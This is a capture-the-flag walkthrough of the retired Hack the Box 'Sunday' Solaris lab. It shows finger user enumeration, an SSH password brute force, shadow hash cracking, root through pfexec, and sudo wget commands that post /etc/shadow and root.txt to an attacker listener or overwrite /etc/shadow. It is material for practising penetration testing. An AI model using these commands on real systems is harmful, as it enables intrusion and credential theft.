Today we are going to solve another CTF challenge “Sunday. Sunday is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
Let’s start off with scanning the network to find our target.
c:\Users\jacco>nmap -p- -A 10.10.10.76 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-14 20:56 W. Europe Standard Time Nmap scan report for 10.10.10.76 Host is up (0.022s latency). Not shown: 63170 filtered ports, 2360 closed ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd | finger: Login Name TTY Idle When Where\x0D |_sunny sunny pts/2 6 Thu 19:03 10.10.14.20 \x0D 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) 61851/tcp open smserverd 1 (RPC #100155) 63175/tcp open unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=3/14%OT=79%CT=6%CU=42216%PV=Y%DS=2%DC=T%G=Y%TM=5C8AB26 OS:F%P=i686-pc-windows-windows)SEQ(SP=92%GCD=1%ISR=A3%TI=I%CI=I%II=I%SS=S%T OS:S=7)SEQ(TI=I%CI=I%II=I%SS=S%TS=7)SEQ(CI=I%II=I)OPS(O1=NNT11M54DNW0NNS%O2 OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S) Network Distance: 2 hops Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 37.00 ms 10.10.14.1 2 38.00 ms 10.10.10.76 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds
So here, we notice very interesting result from nmap scan, here it shown port 79 is open for Sun Solaris fingered. So I Googled for its exploit and found Metasploit exploit “Finger Service User Enumerator”.
Then I load Metasploit framework for Identify valid users through the finger service using a variety of tricks and therefore, use the following module.
|
1
2
3
4
|
use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set users_file /root/pentest/SecLists/Usernames/Names/names.txt
msf auxiliary(scanner/finger/finger_users) > exploit
|
Exploit
So, basically it reviled so many usernames which it has found, now make a dictionary of the obtain username and password that will be helpful in SSH login brute force.
Here we have used “patator” for SSH login to launch brute force on port 22022 and execute the following command.
root@kali:~/htb/sunny# patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top15575.txt persistent=0 16:18:12 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-14 16:18 EDT 16:18:12 patator INFO - 16:18:12 patator INFO - code size time | candidate | num | mesg 16:18:12 patator INFO - ----------------------------------------------------------------------------- 16:18:13 patator INFO - 1 22 0.253 | 123456 | 1 | Authentication failed. 16:18:13 patator INFO - 1 22 0.195 | 123456789 | 3 | Authentication failed. 16:18:13 patator INFO - 1 22 0.197 | password | 2 | Authentication failed. 16:18:14 patator INFO - 1 22 0.194 | 12345 | 5 | Authentication failed. 16:18:14 patator INFO - 1 22 0.190 | qwerty | 6 | Authentication failed. --snip-- 16:18:17 patator INFO - 1 22 0.220 | 654321 | 14 | Authentication failed. 16:18:17 patator INFO - 1 22 0.190 | superman | 23 | Authentication failed. 16:18:17 patator INFO - 0 19 0.224 | sunday | 22 | SSH-2.0-Sun_SSH_1.3 16:18:17 patator INFO - 1 22 0.220 | internet | 25 | Authentication failed. 16:18:18 patator INFO - 1 22 0.201 | iloveyou | 26 | Authentication failed. 16:18:18 patator INFO - 1 22 0.195 | michael | 24 | Authentication failed. 16:18:18 patator INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 4 r/s, Time: 0h 0m 6s
Password: sunday
But when we try to login into ssh by using above credential, it gave “no matching key exchange method found” error and also put some hint and drop the connection request.
Then with little more research, I edit the following key to connect SSH and luckily obtain tty shell access.
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022 sudo -l
Inside shadow.backup, I found hashes for users Sammy and Sunny.
PS C:\Users\jacco> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022 Password: sunday Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 sunny@sunday:~$ sudo -l User sunny may run the following commands on this host: (root) NOPASSWD: /root/troll sunny@sunday:~$ ls Desktop Documents Downloads local.cshrc local.login local.profile Public sunny@sunday:~$ cd / sunny@sunday:/$ ls backup boot dev etc home lib media net platform root sbin tmp var bin cdrom devices export kernel lost+found mnt opt proc rpool system usr sunny@sunday:/$ cd backup sunny@sunday:/backup$ ls agent22.backup shadow.backup sunny@sunday:/backup$ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636:::::: sunny@sunday:/backup$
So we try to crack these hashes by using john the ripper and fortunately obtained the password in plaintext format “cooldude!” of user sammy.
Privilege Escalation Techniques
The pfexec program is used to execute commands with the attributes specified by the user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh, pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell, respectively.
sunny@sunday:/root# find / -perm -u=s -type f 2>/dev/null /usr/sbin/traceroute /usr/sbin/pmconfig /usr/sbin/deallocate /usr/sbin/i86/whodo /usr/sbin/allocate /usr/xpg4/bin/crontab /usr/xpg4/bin/at /usr/bin/stclient /usr/bin/sys-suspend /usr/bin/rsh /usr/bin/crontab /usr/bin/rdist /usr/bin/sudo /usr/bin/lpset /usr/bin/amd64/w /usr/bin/amd64/uptime /usr/bin/amd64/newtask /usr/bin/chkey /usr/bin/login /usr/bin/pfexec /usr/bin/newgrp
Now execute the following command to obtain root privilege shell.
sunny@sunday:/backup$ pfexec bash sunny@sunday:/backup# id uid=0(root) gid=0(root) groups=10(staff) sunny@sunday:/backup# cd /root sunny@sunday:/root# cat root.txt fb4*****9b8
Method 2
Now let’s switch from Sunny to Sammy and figure-out assigned sudo permission for him.
sunny@sunday:/backup$ sudo -l User sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget
As we know that the sudo permission is available for the wget, thus we can use post-file option method to send the contents of any file for example /etc/password or /etc/shadow files.
Therefore we execute the following command to post shadow file content on our local listening machine.
sunny@sunday:~# sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.20 --19:37:03-- http://10.10.14.20/ => `index.html' Connecting to 10.10.14.20:80... connected. HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80 listening on [any] 80 ... 10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 48158: NO_DATA POST / HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.10.14.20 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 634 root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: dladm:*LK*::::::: smmsp:NP:6445:::::: listen:*LK*::::::: gdm:*LK*::::::: zfssnap:NP::::::: xvm:*LK*:6445:::::: mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
From the given image, you can observe that we have obtained the hash value of the root user. Either you can crack the hash value or can modify it.
So we have copied the above content in a text file and so that we can replace the hash value of user: root from the hash value of user: sunny.
Now download the above-modified shadow file in its original path i.e. /etc/shadow, so that it will overwrite the original shadow file.
sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
Method 3
Similarly, we can also post the content of the root.txt file directly to the listening machine.
sunny@sunday:~# sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.20 --19:45:30-- http://10.10.14.20/ => `index.html' Connecting to 10.10.14.20:80... connected. HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80 listening on [any] 80 ... 10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 35773: NO_DATA POST / HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.10.14.20 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 33 fb4*****9b8